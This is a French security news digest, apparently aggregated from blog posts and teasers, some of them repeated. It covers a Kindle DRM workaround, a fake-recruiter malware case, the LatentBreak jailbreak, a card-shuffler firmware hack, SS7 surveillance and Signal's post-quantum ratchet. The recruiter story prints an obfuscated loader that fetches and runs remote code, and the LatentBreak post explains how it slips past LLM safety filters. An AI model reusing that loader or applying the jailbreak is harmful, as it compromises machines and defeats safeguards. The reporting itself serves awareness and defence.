Voici l’histoire de Pixelmelt, un développeur qui voulait simplement sauvegarder en local un ebook acheté sur Amazon pour le lire avec une autre app parce que l’app Kindle d’Android a crashé une fois de trop à son goût.

Mais c’est impossible. Pas de bouton download, pas d’export, que dalle… Même si vous avez acheté le livre, c’est Amazon qui décide de comment et de quand vous pouvez le lire.

Bref, frustré, il se tourne alors vers le Kindle Cloud Reader, la version web de l’app. Et là, il découvre un truc incroyable ! Amazon a créé un système d’obfuscation tellement complexe qu’il ressemble aux techniques de cryptographie des manuscrits anciens. Mais siii, vous savez, ces textes enluminés que seuls les moines pouvaient déchiffrer au Moyen-Âge. Amazon a réinventé le concept en version numérique.

Pour fonctionner, le Kindle Cloud Reader utilise un endpoint de rendu qui nécessite plusieurs tokens d’authentification. Déjà c’est pas simple. Mais ça se corse un peu plus quand on regarde le texte qui s’affiche car ce ne sont pas des lettres ! Ce sont des glyphes, essentiellement des séries de coordonnées qui dessinent une lettre. Ainsi, au lieu de stocker le caractère ‘T’, Amazon stocke “glyphe 24” qui correspond à une forme dessinée via des commandes SVG. Et ces glyphes changent de mapping toutes les 5 pages, un peu comme un codex (coucou Dan Brown ^^) où l’alphabet se transforme à tous les chapitres.

Du coup, pour son livre de 920 pages, il a fallu faire 184 requêtes API distinctes. Chaque requête récupère un nouveau jeu de glyphes soit au total 361 glyphes uniques découverts, et 1 051 745 glyphes à décoder. Oui, ça fait plus d’un million de symboles à traduire pour lire un seul livre.

Amazon a même ajouté des pièges comme des micro-opérations MoveTo complètement inutiles dans les SVG qui s’affichent parfaitement dans le navigateur mais cassent toute tentative de parsing automatique. C’est de l’anti-scraping placé là volontairement, comme des fausses pistes dans des cryptogrammes médiévaux destinées à tromper les copistes non autorisés.

Face à ce délire, notre développeur est alors devenu malgré lui un crypto-archéologue. Sa méthode a donc été de comparer pixel par pixel chaque caractères, valider chaque hypothèse, pour tout reconstruire patiemment. Je vous passe les détails techniques mais il a sorti chaque glyphe SVG sous la forme d’une image, puis a comparé ces images pour trouver leur correspondance avec les vraies lettres en utilisant un outil (SSIM) qui simule la perception humaine pour évaluer la similarité entre deux images.

Résultat, 100% des glyphes matchés ont un score quasi-parfait ce qui lui a permis de reconstruire un fichier EPUB complet avec le formatage, les styles, les liens internes…etc. Tout y est, c’est trop fort !

Bref, Pixelmelt 1 - Amazon 0 ! Et ça, ça fait plaisir ! Maintenant si vous voulez connaitre tous les détails de ça et refaire la même chez vous (pour rigoler hein, ne vous lancez pas dans dans une opération de piratage massif sinon vous finirez en taule comme Sarko ^^)

Vous avez peur que l’IA prenne votre boulot ? Et bien David Dodda, lui, a failli se faire avoir par un faux boulot et c’est son IA qui l’a sauvé ! Je vous explique !

Tout commence classiquement sur LinkedIn. David reçoit un message de Mykola Yanchii, Chief Blockchain Officer chez Symfa, une boîte qui développe des plateformes blockchain. Le profil LinkedIn a l’air béton… Il a plus de 1000 connexions, une page entreprise nickel, bref tout respire le sérieux.

Et son message est pro, poli, et propose à David un poste à temps partiel sur BestCity, une plateforme immobilière. Bref, c’est le genre d’opportunité qu’on ne refuse pas quand on est développeur freelance comme David.

Le premier rendez-vous par visio se passe très bien. Le recruteur connait son sujet, pose les bonnes questions, explique le projet et ensuite, comme dans 99% des processus de recrutement tech, on envoie à David un test technique à réaliser chez lui. Il s’agit d’un projet hébergé sur Bitbucket, du code React et Node.js bien propre et sa mission c’est de compléter quelques fonctionnalités et renvoyer le tout avant la prochaine réunion.

Sauf que David, lui, a pris un réflexe que peu de gens ont. Avant même de lancer npm install, il a demandé à son assistant IA (Cursor) de scanner le code pour détecter d’éventuels patterns suspects. Et là, bingo ! L’IA trouve un truc louche dans le fichier server/controllers/userController.js.

Il s’agit d’un malware qui était bien planqué dans une fonction asynchrone complètement obfusquée. Un tableau d’octets encodé en ASCII qui, une fois décodé en UTF-8, révèle une URL pointant vers une API externe. Et cette URL récupère un payload qui est ensuite exécutée avec tous les privilèges Node.js. Cela débouche à sur un accès complet au système, aux credentials, aux wallets crypto, aux données clients…etc. Le jackpot pour un attaquant !

//Get Cookie
(async () => {
 const byteArray = [
 104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
 110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
 98, 50, 48, 51, 49, 102, 98, 57
 ];
 const uint8Array = new Uint8Array(byteArray);
 const decoder = new TextDecoder('utf-8');
 axios.get(decoder.decode(uint8Array))
 .then(response => {
 new Function("require", response.data.model)(require);
 })
 .catch(error => { });
})();

Et le truc flippant, c’est le niveau de sophistication de l’opération car là on n’a pas affaire à un script kiddie qui balance un trojan par email. Non, c’est une vraie infrastructure professionnelle avec un profil LinkedIn premium, un Calendly pour la prise de rendez-vous, un Bitbucket privé, du code source propre et fonctionnel (hormis le malware planqué). Et surtout, l’URL du malware est devenue HS 24 heures à peine après l’attaque. C’est donc une infrastructure éphémère qui laisse zéro trace.

Si je relaye ce témoignage de David c’est parce que ce genre d’attaque se multiplie. Ce n’est pas un cas isolé… Par exemple le groupe nord-coréen Lazarus utilise cette technique depuis des mois, en créant de fausses entreprises crypto, de faux profils de recruteurs sur LinkedIn, Upwork, Freelancer, et en ciblant spécifiquement les développeurs. Le malware déployé s’appelle BeaverTail, et il installe ensuite un backdoor Python baptisé InvisibleFerret qui fonctionne sur Windows, Linux et macOS. Ce truc vise surtout les extensions de navigateur comme MetaMask ou Coinbase Wallet, récupère tous les mots de passe stockés, et collecte tout ce qui traine.

Alors pourquoi ça marche aussi bien ?

Hé bien parce que les hackers exploitent nos biais cognitifs. L’ambition de décrocher un bon job, la politesse pour ne pas vexer un recruteur, l’urgence créée artificiellement pour qu’on ne prenne pas le temps de réfléchir, la peur de rater une opportunité. Bref, toutes ces émotions qui court-circuitent notre esprit critique.

Heureusement que David a lancé une analyse IA du code sinon, il aurait eu de gros problèmes. Ça prend 30 secondes comme geste barrière et ça peut vous sauver des milliers d’euros et des centaines d’heures de galère.

Si David n’avait pas eu ce réflexe, il aurait lancé npm install, puis npm start, et le malware se serait exécuté en arrière-plan pendant qu’il codait tranquillement ses fonctionnalités. L’attaquant aurait alors eu accès à tout : Ses identifiants GitHub, ses clés SSH, ses tokens d’API, ses wallets crypto si il en a et peut-être même les données de ses clients. Le cauchemar absolu.

Voilà, donc méfiez vous de ce qui arrive via des plateformes de recrutement, on ne sait jamais ! Vous n’aurez peut être pas le job mais vous garderez votre ordinateur propre, vous conserverez vos cryptos, vos mots de passe et vos clients et ça c’est déjà pas si mal !

Source

Dans un communiqué adressé à ses clients le 14 octobre 2025, l’enseigne de prêt-à-porter Mango a annoncé la fuite de certaines données personnelles. La marque espagnole précise que ses propres systèmes n’ont pas été compromis : l’incident provient d’un de ses prestataires marketing externes.

Dans un communiqué adressé à ses clients le 14 octobre 2025, l’enseigne de prêt-à-porter Mango a annoncé la fuite de certaines données personnelles. La marque espagnole précise que ses propres systèmes n’ont pas été compromis : l’incident provient d’un de ses prestataires marketing externes.

Vous connaissez peut-être ces machines à mélanger les cartes qu’on trouve dans tous les casinos américains ?

Moi je ne savais même pas que ça existait, mais apparemment, le Deckmate 2, fabriqué par Shufflemaster (devenu depuis Light and Wonder), c’est la Rolls des shufflers. Un shuffler c’est pas un légume dégeu, c’est un mélangeur de cartes et on en trouve notamment au World Series of Poker (La biz à Patrick Bruel ^^), et dans tous les grands poker rooms de Vegas.

Cela permet d’automatiser le mélange pour accélérer le jeu et surtout éviter que ceux qui distribuent les cartes (les dealers) trichent avec de faux mélanges. La machine a même une caméra intégrée qui scanne chaque carte pour détecter si quelqu’un essaie de retirer un as ou d’ajouter un sept de pique.

En septembre 2022, il y a eu un scandale qui a secoué le monde du poker. Au Hustler Casino Live de Los Angeles, une joueuse relativement débutante, Robbi Jade Lew, gagne un pot de 269 000 dollars avec un call complètement fou. Elle avait valet-quatre dépareillés (un truc nul), et son adversaire Garrett Adelstein bluffait avec huit-sept. Techniquement, son call était correct, mais aucun joueur sensé n’aurait misé 109 000 dollars sur une main pareille sans savoir que l’adversaire bluffait… Le casino a donc lancé une enquête et conclu que le shuffler ne pouvait pas être compromis.

Mais même si ce n’était pas le cas pour cette affaire, est ce que c’est vrai ? Est ce qu’un Deckmate 2 peut être hacké ? Pour le chercheur en sécurité, Joseph Tartaro, ça s’est présenté comme un nouveau défi personnel !

Il a donc acheté un Deckmate 2 d’occasion avec deux collègues et a passé des mois à le démonter… pour finalement trouver quelques trucs intéressants, vous allez voir.

Il a découvert que la machine a un port USB accessible sous la table, là où les joueurs posent les genoux. Tartaro a donc créé un mini-ordinateur de la taille d’une clé USB qui, une fois branché, réécrit le firmware de la machine. La seule sécurité qu’il y a, c’est au démarrage, quand la machine vérifie que le code n’a pas changé en comparant son empreinte à une valeur connue.

C’est une simple comparaison de hash et le problème est que Tartaro peut modifier cette valeur de référence aussi… Du coup, le système de vérification contrôle que le code piraté correspond au hash piraté. C’est ballot ^^. Et une fois le firmware modifié, la machine continue à fonctionner normalement sauf qu’elle transmet maintenant l’ordre exact des 52 cartes via Bluetooth vers une app smartphone. Et comme la caméra interne de ce Deckmate 2 scanne déjà toutes les cartes pour détecter les fraudes, il suffit d’exploiter cette fonctionnalité.

Un journaliste de Wired a décidé de mettre ça en pratique dans des conditions réelles et vous allez voir, c’est sympa à voir.

Et si on pouvait pirater une IA non pas en la forçant, mais en la convainquant qu’elle est toujours du bon côté de la barrière ?? Ce serait pas un truc fun à faire ça quand même ? Hé bien c’est exactement ce que vient de faire une équipe de chercheurs en sécurité avec LatentBreak, une technique qui ressemble plus, je trouve, à de l’hypnose qu’à du véritable hacking.

Ainsi, plutôt que de bombarder ChatGPT ou Llama avec des prompts bizarres bourrés de caractères spéciaux pour les faire bugger (comme le font les anciennes techniques de jailbreak), LatentBreak joue sur la perception interne du modèle. L’IA croit en fait sincèrement répondre à une question innocente alors qu’elle génère du contenu dangereux. Un peu comme quand votre pervers narcissique préféré vous manipule pour vous faire croire que vous faites un truc bien et important alors que c’est de la merde et que ça vous enfonce encore plus…

Comme expliqué dans le document de recherche , les anciennes attaques comme GCG , GBDA ou AutoDAN ajoutaient des suffixes louches aux prompts, ce qui augmentait ce qu’on appelle la “perplexity”. La perplexity, c’est un indicateur de bizarrerie textuelle et cela, les filtres de sécurité sont maintenant capables de les détecter et de les bloquer.

LatentBreak contourne donc le problème en restant parfaitement naturel. L’algorithme remplace des mots par des synonymes, mais pas n’importe comment puisqu’il choisit chaque substitution pour déplacer la représentation interne du prompt vers les zones “sûres” du modèle, c’est à dire celles qui ne déclenchent aucune alarme. Le prompt reste alors fluide, compréhensible, inoffensif en apparence mais dans l’“inconscient” de l’IA, dans cet espace latent invisible où elle calcule ses réponses, le sens glisse subtilement vers quelque chose de complètement différent.

À chaque itération, l’algorithme de LatentBreak prend un mot du prompt et génère jusqu’à 20 alternatives via un autre modèle comme GPT-4o-mini et chaque variante est évaluée sur deux critères : est-ce qu’elle rapproche le vecteur interne du prompt d’un “centre de sécurité” dans l’espace latent, et est-ce que le sens global reste cohérent ?

La meilleure option est alors intégrée, et le nouveau prompt est testé sur le modèle cible. Si ça provoque une réponse normalement interdite, c’est gagné. Sinon, on recommence jusqu’à 30 fois de suite.

Et apparemment, les résultats sont impressionnants. Ils ont testé cette approche sur 13 modèles différents dont Llama-3, Mistral-7B, Gemma-7B, Vicuna-13B et Qwen-7B et LatentBreak affiche un taux de réussite entre 55 et 85% selon les cas. Les anciennes techniques tombant de toute façon à zéro face aux défenses modernes et tout ça en allongeant que de très peu la longueur du prompt.

LatentBreak passe d’ailleurs à travers des défenses réputées solides… Par exemple, R2D2 et Circuit Breakers, des systèmes qui analysent les signaux internes des neurones pour détecter les anomalies, se font totalement avoir parce qu’ils scannent le texte visible et les patterns de surface, mais pas la “pensée interne” du modèle.

Cette technique révèle quelque chose de fondamental à comprendre sur l’architecture des LLM modernes. Ces derniers ont une forme de dissonance cognitive qui est exploitable. Leur représentation interne ne correspond pas toujours à leur comportement affiché, et d’ailleurs les substitutions les plus efficaces se produisent près des dernières couches du modèle, là où la “décision” finale se forme. C’est à ce moment précis qu’on peut glisser le prompt dans une zone cognitive différente sans que les alarmes ne sonnent.

Bien sûr, LatentBreak nécessite un accès aux structures internes du modèle (donc pas de panique, ChatGPT ne va pas se faire pirater comme ça demain), ce qui limite son usage à des contextes de recherche ou aux modèles open source.

Le parallèle avec les techniques de social engineering qu’on connait est d’ailleurs frappant parce que quand vous manipulez quelqu’un, vous ne le forcez pas brutalement. Vous trouvez les bons mots, le bon contexte, vous lui donnez une perception qui correspond à ce que vous voulez… Bref, vous faites en sorte que la personne croie agir selon ses propres valeurs alors qu’elle fait exactement ce que vous voulez. Hé bien LatentBreak fait à peu près la même chose avec les IA en n’attaquant pas de front les protections, mais en les contournant en douceur en réécrivant la “mémoire de travail” du modèle.

Sympa non ?

Source

Le 15 octobre 2025, le géant des solutions réseau F5 a révélé avoir été victime d'une cyberattaque. Depuis, plusieurs sociétés spécialisées en cybersécurité sont mobilisées pour contenir l’incident et protéger ses clients. L’enjeu est majeur : F5 fournit des solutions informatiques au gouvernement américain, mais également aux plus grandes entreprises du monde. L’attaque serait attribuée à un acteur étatique.

Le 15 octobre 2025, le géant des solutions réseau F5 a révélé avoir été victime d'une cyberattaque. Depuis, plusieurs sociétés spécialisées en cybersécurité sont mobilisées pour contenir l’incident et protéger ses clients. L’enjeu est majeur : F5 fournit des solutions informatiques au gouvernement américain, mais également aux plus grandes entreprises du monde. L’attaque serait attribuée à un acteur étatique.

Apprenez à comparer deux scans Nmap avec Ndiff pour détecter rapidement les changements d’hôtes et de services et suivre l’évolution de votre réseau.

The post Suivi réseau : comparer des scans Nmap avec l’outil ndiff first appeared on IT-Connect.

F5 a publié des mises à jour de sécurité pour son produit BIG-IP car des pirates sont parvenus à voler des informations sur des vulnérabilités non corrigées.

The post Cyberattaque – F5 BIG-IP : des pirates ont volé des informations sur des failles non corrigées ! first appeared on IT-Connect.

À l’occasion du Cyber Mois 2025, dont la thématique interrogeante « Et si l’Histoire avait été bouleversée par de mauvaises pratiques cyber ? » nous invite à une réflexion profonde, nous mesurons à quel point la sécurité numérique constitue aujourd’hui un enjeu civilisationnel. Cette treizième édition nous rappelle avec justesse que les défaillances en matière […]

La dernière enquête de Kaspersky, menée auprès des décideurs en matière de cybersécurité dans les PME revient sur les défis quotidiens et les idées reçues des responsables informatiques des PME, ainsi que l’impact de ces obstacles sur leur collaboration avec des partenaires extérieurs. Le rapport montre qu’un tiers des petites et moyennes entreprises européennes (33 […]

Ce 14 octobre 2025, Lighthouse Reports a balancé une enquête mondiale qui fait actuellement trembler l’industrie de la surveillance. Pour cette enquête titanesque, ce sont 70 journalistes de 14 médias différents dont Le Monde, Der Spiegel et Mother Jones qui ont bossé pendant des mois sur le même dossier et celui-ci est explosif.

Leur sujet c’est First Wap, une boîte indonésienne qui a discrètement espionné au fil des années, plus de 14 000 numéros de téléphone dans 168 pays grâce à un logiciel baptisé Altamides. Leurs cibles sont des journalistes d’investigation, des activistes, des PDG, des célébrités, même la fondatrice de 23andMe. Et ils ont fait tout cela, en exploitant une faille vieille comme le monde dans les réseaux télécoms.

L’un des cofondateurs de First Wap est même français et s’appelle Pascal Lalanne. Il a crée cette boîte en 1999 à Jakarta avec Josef Fuchs, un Autrichien au destin hors du commun, mais avant de vous raconter comment ils ont construit cet empire de la surveillance, rembobinons un peu pour comprendre toute cette histoire depuis le début…

Direction 1984, l’année où Josef Fuchs, jeune ingénieur autrichien de Siemens fraîchement débarqué de son Tyrol natal, pose ses valises à Jakarta pour ce qui devait être une mission de trois mois. Il doit installer des systèmes de télécommunications pour le tout nouveau aéroport de Cengkareng. L’Indonésie représente son dernier contrat avec Siemens après huit ans de bons et loyaux services.

Sauf que Fuchs tombe amoureux du pays, de sa culture, et de ses possibilités infinies. En 1989, fidèle à ses racines européennes, il retourne en Allemagne de l’Est juste après la chute du Mur pour monter une boîte et une école. Le projet est un succès qui perdure encore aujourd’hui, mais l’appel de l’Asie reste plus fort.

Le 1er janvier 1995, Fuchs reçoit un fax décisif d’un ami indonésien : “La dérégulation est arrivée. Tu viens ?” Quatre jours plus tard, le 5 janvier, il embarque direction Jakarta. Cette fois, c’est pour bosser chez Telkomsel, l’un des plus gros opérateurs télécoms indonésiens qui émerge de cette nouvelle ère de libéralisation du marché.

Et c’est là, dans les entrailles de Telkomsel, que Fuchs comprend. Il passe ses journées à plonger dans les réseaux téléphoniques indonésiens et voit passer des millions de signaux de communication entre les opérateurs du monde entier. Tous transitent par le même protocole ancestral : SS7, pour Signalling System 7.

Développé par AT&T en 1975 et standardisé en 1980 , SS7 représente le système nerveux des télécommunications mondiales. Concrètement, quand vous appelez quelqu’un à l’étranger, c’est SS7 qui fait transiter l’appel d’un opérateur à l’autre. Quand vous recevez un SMS en vacances au bout du monde, c’est SS7 qui route le message. Le système est omniprésent, invisible, et surtout terriblement obsolète.

Le souci c’est que SS7 n’a jamais été conçu pour être sécurisé. À l’époque de sa création, seuls les opérateurs télécoms publics y avaient accès et on leur faisait une confiance aveugle. Donc pas de vérification d’identité forte, pas de chiffrement costaud, rien. Une confiance naïve qui date d’une ère où Internet n’existait pas encore.

Fuchs réalise le potentiel colossal de cette faiblesse structurelle et fonde en 1999 First Wap avec Pascal Lalanne, ce Français dont on ne sait presque rien encore aujourd’hui. L’association Fuchs-Lalanne est un duo Franco-Autrichien redoutable : l’un apporte l’expertise technique accumulée chez Siemens et Telkomsel, l’autre la vision business et les connexions en Asie du Sud-Est.

First Wap démarre initialement dans la messagerie électronique par SMS, un service qui cartonne en Asie où les téléphones portables se multiplient à une vitesse folle. Mais en 2000, la bulle Internet explose et tout le secteur tech vacille. Lalanne quitte alors le navire en 2004 , revend ses parts et disparaît ensuite complètement des radars. Depuis vingt ans, c’est silence radio total. Aujourd’hui, on sait juste qu’il s’est reconverti dans l’écologie et a dirigé un sanctuaire naturel à Lombok, en Indonésie. Un virage à 180 degrés.

Mais Fuchs, lui, continue. Et il a une idée qui va révolutionner le marché de la surveillance.

Début des années 2000, Fuchs et son équipe créent alors Altamides. Le nom signifie Advanced Location Tracking and Mobile Information and Deception System. L’idée c’est d’exploiter SS7 pour faire croire au réseau télécom que vous êtes un opérateur légitime. Cela permet de localiser n’importe quel téléphone en temps réel, d’intercepter des SMS, d’écouter des appels, et même de pirater WhatsApp (oui, je vous explique tout après).

Pas besoin d’infecter le téléphone de la victime comme avec Pegasus ou un logiciel espion complexe qui coûte des millions. Non, Altamides opère au niveau du réseau télécom lui-même , ce qui le rend plus discret, plus simple à déployer, et surtout ça fonctionne partout dans le monde sans exception.

Techniquement parlant, First Wap loue des Global Titles (des adresses réseau utilisées par le protocole SS7) auprès d’opérateurs complaisants, notamment Mobilkom Liechtenstein . Ces adresses leur permettent d’envoyer des requêtes de localisation qui semblent parfaitement légitimes aux yeux des réseaux télécoms mondiaux. Le système ne peut tout simplement pas faire la différence.

Pour vous la faire simple, si votre téléphone est allumé, Altamides peut vous trouver où que vous soyez sur la planète. Et vous ne vous en rendrez jamais compte. Aucune trace sur votre appareil, aucun signe d’infection, aucune batterie qui chauffe bizarrement… C’est l’outil d’espionnage parfait.

L’enquête de Lighthouse Reports permet de mettre la main sur 1,5 million d’enregistrements de tracking récupérés sur le dark web. On parle ici de plus de 14 000 numéros uniques espionnés dans 168 pays entre 2007 et 2014. Mais le vrai chiffre est probablement bien plus élevé puisque l’archive ne représente qu’une fraction de l’activité totale d’Altamides.

Plus c’est violet, plus y’a de cibles. L’Indonésie, et le Nigeria sont particulièrement touchés

Et leur tableau de chasse est hallucinant…

Gianluigi Nuzzi, journaliste d’investigation italien spécialisé dans les affaires vaticanes, publie en mai 2012 son livre explosif “Sua Santità” (Sa Sainteté : Les papiers secrets de Benoît XVI). L’ouvrage révèle des documents confidentiels montrant corruption, luttes de pouvoir et opacité financière au cœur du Vatican. C’est le début du scandale “Vatileaks”.

Et quelques heures seulement après la sortie du bouquin, son téléphone se retrouve tracké par Altamides. Ainsi, pendant que la police vaticane recherche désespérément sa source, quelqu’un d’autre suit Nuzzi à la trace via son smartphone. Les requêtes Altamides tombent d’abord manuellement et irrégulièrement, puis deviennent automatiques à partir du 22 mai. Toutes les heures, à la minute près, soit près de 200 localisations en une semaine.

Le tracking montre Nuzzi à Milan près de son ancien appartement, sur l’autoroute en direction de Rome, dans le centre historique près de la fontaine de Trevi, à l’aéroport et chaque déplacement est méticuleusement consigné.

Quelqu’un voulait savoir s’il rencontrait sa source et où.

Le 23 mai 2012, cinq jours après le début de la surveillance, la gendarmerie vaticane arrête Paolo Gabriele, le majordome personnel du pape depuis 2006. L’homme de 46 ans avait un accès privilégié au bureau privé de Benoît XVI et utilisait le photocopieur du bureau partagé avec les deux secrétaires papaux pour copier documents et lettres confidentielles marquées “à détruire”. Il transmettait ensuite ces copies à Nuzzi lors de rencontres nocturnes dignes d’un thriller hollywoodien à base de longs trajets en voiture pour s’assurer qu’ils n’étaient pas suivis, avec des rencontres dans un appartement vide avec une seule chaise où attendait la source au nom de code “Maria”.

Le 24 mai, le lendemain de l’arrestation de Gabriele, le tracking de Nuzzi s’arrête net. Mission accomplie ? Les documents internes révèlent que la société britannique KCS Group, revendeur d’Altamides, avait présenté le système à des “gens du V.” (le Vatican) à Milan quelques jours avant l’arrestation. La présentation incluait les cartes de déplacement de Nuzzi en temps réel. Le Vatican n’a jamais répondu aux questions des journalistes sur cette affaire.

Paolo Gabriele sera condamné à 18 mois de détention pour vol aggravé. Il dira avoir agi pour dénoncer le “mal et la corruption” qu’il voyait autour du pape, manipulé par son entourage. Benoît XVI le graciera après quelques mois et Gabriele décédera en novembre 2020 à 54 ans d’une longue maladie.

Autre cible, Patrick Karegeya, ancien chef des renseignements extérieurs du Rwanda et bras droit de Paul Kagame, vit en exil forcé en Afrique du Sud depuis 2007. Après avoir aidé Kagame à prendre le pouvoir en 1994, il est tombé en disgrâce, emprisonné deux fois pour “insubordination”, et a fui pour échapper à un sort pire encore. Avec le Général Kayumba Nyamwasa (ancien chef d’état-major), il fonde le Rwanda National Congress, principal mouvement d’opposition en exil.

L’archive d’Altamides montre qu’en janvier 2012, le téléphone d’Emile Rutagengwa, chauffeur et garde du corps de Karegeya, est tracké à plusieurs reprises. En mai, c’est Rosette Nyamwasa, l’épouse du Général, qui devient une cible. Quelqu’un cartographie méthodiquement l’entourage des deux opposants.

Le soir du 31 décembre 2013, Karegeya a rendez-vous au luxueux hôtel Michelangelo Towers de Sandton, le quartier d’affaires huppé de Johannesburg, avec Apollo Kiririsi Gafaranga, un homme d’affaires rwandais qu’il connaît depuis l’époque où il dirigeait les services secrets. À 19h46, Karegeya envoie un dernier message rassurant à son neveu David Batenga. Tout va bien, il est avec Apollo.

Le 1er janvier 2014 vers 17h30, le personnel de l’hôtel découvre Karegeya étranglé dans la chambre 905, une serviette ensanglantée et une corde retrouvées dans le coffre-fort de la chambre. Apollo Kiririsi a disparu et a déjà pris un vol pour Kigali. La surveillance Altamides a précédé cet assassinat de 18 mois.

Dans les jours suivant le meurtre, des officiels rwandais se réjouissent publiquement. La ministre des Affaires étrangères Louise Mushikiwabo tweete : “Ce n’est pas comment tu commences qui compte, c’est comment tu finis. Cet homme s’est déclaré ennemi de mon gouvernement et de mon pays. Vous attendez de la pitié ?” Le ministre de la Défense James Kabarebe est encore plus brutal : “Quand tu choisis d’être un chien, tu meurs comme un chien.”

Kagame lui-même déclare publiquement quelques jours plus tard : “Toute personne encore en vie qui complote contre le Rwanda, qui qu’elle soit, paiera le prix. Les conséquences sont les conséquences.” En 2019, un juge sud africain révèle que “des liens étroits existent entre les suspects et le gouvernement rwandais actuel”. Mais aucun des suspects n’a jamais été arrêté et continuent de vivre tranquillement au Rwanda.

Des chercheurs américains ont révélé une cyberattaque d’un genre inédit, baptisée « Pixnapping », reposant sur le vol de pixels. Cette technique exploite des failles dans le système graphique d'Android et s’avère très efficace sur les modèles les plus récents, dont les Google Pixel et certains Samsung.

Des chercheurs américains ont révélé une cyberattaque d’un genre inédit, baptisée « Pixnapping », reposant sur le vol de pixels. Cette technique exploite des failles dans le système graphique d'Android et s’avère très efficace sur les modèles les plus récents, dont les Google Pixel et certains Samsung.

L’apocalypse de l’informatique quantique, c’est un truc que les experts annoncent régulièrement depuis 30 ans. Et cette fois ça commence à se préciser car si j’en crois Gartner , c’est pour 2029 - 2034 !

C’est le “on verra ça la semaine prochaine” éternel de la sécurité informatique, sauf que pendant que tout le monde rigole nerveusement en se disant on a le temps, Signal, eux s’attaquent sérieusement au sujet. Et il viennent de publier un write-up technique assez long expliquant comment ils ont déjà régler le problème.

Actuellement, seulement 18% des entreprises du Fortune 500 ont des réseaux protégés contre les ordinateurs quantiques donc autant vous dire que pas grand monde n’est prêt. Heureusement, on va tous pouvoir s’inspirer de ce qu’a fait Signal qui a mis au point un nouveau système baptisé SPQR (Sparse Post Quantum Ratchet, que j’imagine être un jeu de mot avec le SPQR romain… ).

Le problème, c’est que la cryptographie post-quantique, c’est pas juste une mise à jour de sécurité comme les autres. Concrètement, les nouvelles clés cryptographiques résistantes aux ordinateurs quantiques (ML-KEM-768, pour les intimes) font 2 272 bytes alors que les anciennes clés ECDH ne sont que de 32 bytes. C’est donc 71 fois plus gros et donc nos échanges chiffrés vont consommer encore plus de bande passante.

Et ça, c’est juste la partie visible du problème car Signal, c’est pas WhatsApp qui peut se permettre de dire “tant pis, on a de la thune, on va juste consommer plus de bande passante”. Non, Signal lui doit fonctionner partout c’est à dire aussi bien sur les vieux téléphones, que sur les réseaux pourris, ou dans les pays où les gouvernements surveillent activement le trafic. Et tout ça en restant plus sécurisé que n’importe quel autre service. C’est pas évident donc…

En 2023, Signal avait déjà fait une première mise à jour post-quantique avec PQXDH . L’idée, c’était de sécuriser la phase d’initialisation des conversations (le fameux handshake) au travers d’une approche hybride. En gros, on garde l’ancienne méthode X25519 et on ajoute un Kyber-1024 par-dessus, comme ça, même si les ordinateurs quantiques cassent l’une des deux protections, l’autre tient encore.

C’est malin, mais bon, ça ne suffisait pas car le handshake, c’est juste le début pour initialiser la conversation. Alors Signal a mis au point un système appelé le “Double Ratchet” qui fait évoluer les clés de chiffrement en permanence. Ainsi, à chaque message envoyé ou reçu, hop, de nouvelles clés sont générées. C’est ce qui donne à Signal ses super-pouvoirs : la forward secrecy (en gros, ça veut dire que si on vous pirate aujourd’hui, on ne peut pas déchiffrer vos vieux messages) et la post-compromise security (si on vous pirate, vous récupérez automatiquement une connexion sécurisée après quelques échanges).

Ce Double Ratchet, c’était une merveille d’ingénierie, sauf que devinez quoi… il repose entièrement sur ECDH, qui sera totalement cassable par les ordinateurs quantiques d’ici quelques années.

Donc il a fallu tout repenser !

Signal a donc ajouté un troisième ratchet au système. Un Triple Ratchet, le SPQR, qui fonctionne en parallèle des deux autres et injecte régulièrement des secrets post-quantiques dans le mélange.

L’astuce géniale, c’est qu’ils utilisent des “erasure codes”. C’est un peu comme les codes de correction d’erreur sur les CD, mais pour reconstituer des clés cryptographiques manquantes. Hé oui parce que sur un réseau merdique (ou surveillé par un vilain méchant gouvernement), des paquets se perdent. Du coup, avec les erasure codes, même si vous loupez quelques messages, vous pouvez quand même reconstituer les clés.

Et pour régler le problème de la taille des clés (vous vous souvenez, l’explosion de la bande passante ?), ils ont parallélisé les échanges de clés comme ça au lieu d’envoyer une grosse clé à chaque message, ils en envoient plusieurs petites en parallèle, réparties sur plusieurs messages. Ainsi, l’impact sur la bande passante reste raisonnable.

Voilà, donc pour résumer Signal a réussi à ajouter une protection post-quantique complète, en maintenant la forward secrecy et la post-compromise security, tout en gérant les environnements asynchrones (quand les gens sont offline), les réseaux pourris et les adversaires actifs. Tout ça avec un impact minimal sur les perfs ! C’est beau non ?

Et le plus beau dans tout ça c’est que pour nous, les utilisateurs rien ne change ! Toute cette complexité technique est totalement invisible. D’ailleurs les entreprises françaises feraient bien de se mettre sur le sujet car le temps passe vite. L’ANSSI a même tiré la sonnette d’alarme et fixé des échéances précises pour que les entreprises se bougent. Les secteurs les plus à risque (banques, santé, infrastructures critiques…) sont en première ligne. En plus quand on sait que les cybercriminels (et la NSA et compagnie) stockent déjà des données chiffrées pour les déchiffrer plus tard avec des ordinateurs quantiques, l’excuse du “on verra plus tard” ne tient plus vraiment la route.

Signal a ouvert totalement son code et publié ses algos et autres formules donc chaque entreprise qui le souhaite peut aller s’en inspirer. Pour une ONG c’est impressionnant ce qu’ils ont réussi là et ça prouve encore une fois qu’en matière de sécurité, il n’y a pas de fatalité.

Juste des choix.

Source

Le Patch Tuesday d'octobre 2025 publié par Microsoft corrige au total 172 vulnérabilités, dont 6 failles zero-day. Voici un récapitulatif complet.

The post Patch Tuesday – Octobre 2025 : 172 failles de sécurité corrigées, dont 6 zero-day ! first appeared on IT-Connect.

Plus de 200 000 machines Framework sous Linux ont été livrées avec un UEFI vulnérable qui met en péril le Secure Boot : les bootkits peuvent en profiter.

The post Plus de 200 000 ordinateurs Framework vulnérables : une porte d’entrée pour les bootkits first appeared on IT-Connect.

Veeam Backup & Replication est affecté par deux failles critiques (CVSS v3.1 de 9.9 sur 10) : CVE-2025-48983 et CVE-2025-48984. Un patch est disponible.

The post Patchez Veeam Backup & Replication : 2 nouvelles failles critiques RCE ont été découvertes ! first appeared on IT-Connect.